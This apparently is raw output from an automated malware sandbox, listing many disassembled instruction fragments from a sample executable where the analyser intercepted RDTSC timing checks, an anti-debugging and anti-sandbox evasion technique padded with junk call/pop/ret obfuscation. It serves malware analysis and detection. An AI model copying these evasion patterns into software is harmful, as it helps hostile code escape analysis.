Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF692E second address: CF6999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46ED9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F953D46ED98h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D36D6h], ecx 0x0000002b push 00000000h 0x0000002d mov di, EB32h 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F953D46ED98h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d clc 0x0000004e push eax 0x0000004f pushad 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CF8A5E second address: CF8A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFAB1E second address: CFAB22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFAB22 second address: CFABB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D38C4h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F953D015238h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jns 00007F953D01523Eh 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F953D015238h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov bx, DF3Bh 0x00000052 jmp 00007F953D01523Dh 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F953D015248h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFABB3 second address: CFABBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F953D46ED96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFABBD second address: CFABC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFABC1 second address: CFABD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F953D46ED9Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFBC68 second address: CFBC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFBC6F second address: CFBC74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFAD39 second address: CFAD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFBC74 second address: CFBC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFBC7A second address: CFBCD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F953D015238h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007F953D015238h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 push 00000000h 0x00000042 movzx edi, si 0x00000045 push eax 0x00000046 pushad 0x00000047 js 00007F953D01523Ch 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFBCD4 second address: CFBCE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F953D46ED96h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFBCE0 second address: CFBCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFBE8F second address: CFBE93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFBE93 second address: CFBE97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFBE97 second address: CFBE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFCE6C second address: CFCE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFDCAE second address: CFDD3A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F953D46ED98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnc 00007F953D46EDA2h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F953D46ED98h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c or bh, FFFFFFF4h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F953D46ED98h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D388Dh], esi 0x00000051 push 00000000h 0x00000053 or di, 928Ch 0x00000058 xchg eax, esi 0x00000059 push ebx 0x0000005a jmp 00007F953D46ED9Eh 0x0000005f pop ebx 0x00000060 push eax 0x00000061 push edi 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFDD3A second address: CFDD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFFDFB second address: CFFE31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F953D46EDA5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFEFD5 second address: CFEFD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFFE31 second address: CFFE37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFEFD9 second address: CFEFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F953D015241h 0x00000010 jmp 00007F953D01523Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFFF87 second address: CFFF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFFF94 second address: CFFF98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CFFF98 second address: CFFF9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CA2F23 second address: CA2F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CA2F29 second address: CA2F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D04D3B second address: D04D48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D04D48 second address: D04D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D0C0C8 second address: D0C0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D0F5A6 second address: B29B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a add dword ptr [esp], 515D9F97h 0x00000011 jmp 00007F953D46EDA5h 0x00000016 push dword ptr [ebp+122D0071h] 0x0000001c ja 00007F953D46EDA2h 0x00000022 call dword ptr [ebp+122D3A25h] 0x00000028 pushad 0x00000029 jp 00007F953D46ED9Ch 0x0000002f xor eax, eax 0x00000031 pushad 0x00000032 je 00007F953D46EDA4h 0x00000038 adc di, 0848h 0x0000003d popad 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 jmp 00007F953D46EDA8h 0x00000047 mov dword ptr [ebp+122D2A74h], eax 0x0000004d stc 0x0000004e mov esi, 0000003Ch 0x00000053 jng 00007F953D46ED9Ch 0x00000059 sub dword ptr [ebp+122D37BEh], edx 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 pushad 0x00000064 or dword ptr [ebp+122D37BEh], edi 0x0000006a mov esi, dword ptr [ebp+122D2A94h] 0x00000070 popad 0x00000071 lodsw 0x00000073 pushad 0x00000074 cmc 0x00000075 mov eax, dword ptr [ebp+122D2D1Ch] 0x0000007b popad 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 clc 0x00000081 mov dword ptr [ebp+122D37BEh], edx 0x00000087 mov ebx, dword ptr [esp+24h] 0x0000008b cld 0x0000008c nop 0x0000008d push eax 0x0000008e push ebx 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D1645D second address: D16461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D156AF second address: D156CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F953D46EDA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D156CC second address: D156D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D156D7 second address: D156E8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F953D46ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D156E8 second address: D156ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D156ED second address: D156F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D156F3 second address: D156F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D156F9 second address: D156FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D15859 second address: D1585F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D15BC3 second address: D15BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D15BC7 second address: D15BD1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F953D015236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D15D37 second address: D15D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D15D3D second address: D15D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CEBDB9 second address: CEBDDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F953D46EDA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007F953D46EDA4h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CEBDDE second address: CEBDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D16150 second address: D16154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D16154 second address: D16172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F953D015246h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D16172 second address: D16176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D16176 second address: D1618D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D01523Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D1618D second address: D161AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F953D46EDA9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D161AE second address: D161BF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F953D01523Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D1914F second address: D19155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D19155 second address: D1915B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CAB555 second address: CAB56A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007F953D46ED96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007F953D46ED96h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE5C2E second address: CE5C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE5C32 second address: CE5C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F953D46EDA0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE5E0F second address: CE5E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F953D015238h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F953D015249h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE5E39 second address: CE5E70 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F953D46EDA4h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 jmp 00007F953D46EDA7h 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE5F56 second address: CE5F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE603A second address: CE603E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6637 second address: CE663B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE663B second address: CE663F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE663F second address: CE66C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F953D015238h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov edx, dword ptr [ebp+122D2939h] 0x0000002a push 0000001Eh 0x0000002c call 00007F953D015245h 0x00000031 mov ecx, dword ptr [ebp+122D2DDBh] 0x00000037 pop edi 0x00000038 mov dword ptr [ebp+12461D87h], ecx 0x0000003e nop 0x0000003f push edx 0x00000040 jnp 00007F953D01523Ch 0x00000046 pop edx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jmp 00007F953D015240h 0x00000050 jmp 00007F953D01523Dh 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE66C7 second address: CE66E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F953D46EDA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6A2C second address: CE6ABE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F953D015236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F953D015249h 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F953D015238h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov edx, 29FA69AAh 0x00000030 mov edi, dword ptr [ebp+122D2BE4h] 0x00000036 lea eax, dword ptr [ebp+1248F60Ah] 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F953D015238h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000018h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov dword ptr [ebp+122D30C2h], ebx 0x0000005c movzx edx, dx 0x0000005f nop 0x00000060 jmp 00007F953D01523Fh 0x00000065 push eax 0x00000066 push edi 0x00000067 pushad 0x00000068 push esi 0x00000069 pop esi 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CE6ABE second address: CCE8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+122D3075h] 0x0000000d lea eax, dword ptr [ebp+1248F5C6h] 0x00000013 mov edi, ecx 0x00000015 push eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push edx 0x00000019 pop edx 0x0000001a jng 00007F953D46ED96h 0x00000020 popad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 pop eax 0x00000026 popad 0x00000027 popad 0x00000028 mov dword ptr [esp], eax 0x0000002b mov dword ptr [ebp+122D1C09h], ecx 0x00000031 call dword ptr [ebp+122D1847h] 0x00000037 pushad 0x00000038 push esi 0x00000039 pushad 0x0000003a popad 0x0000003b pop esi 0x0000003c jns 00007F953D46EDC2h 0x00000042 jnc 00007F953D46ED9Ch 0x00000048 popad 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: CCE8A1 second address: CCE8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D237FF second address: D2380C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2380C second address: D23810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D23D5C second address: D23D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D2400D second address: D24012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D24185 second address: D2418A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D233DC second address: D233E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D233E0 second address: D23402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F953D46EDA8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\JbN2WYseAr.exeRDTSC instruction interceptor: First address: D23402 second address: D23406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
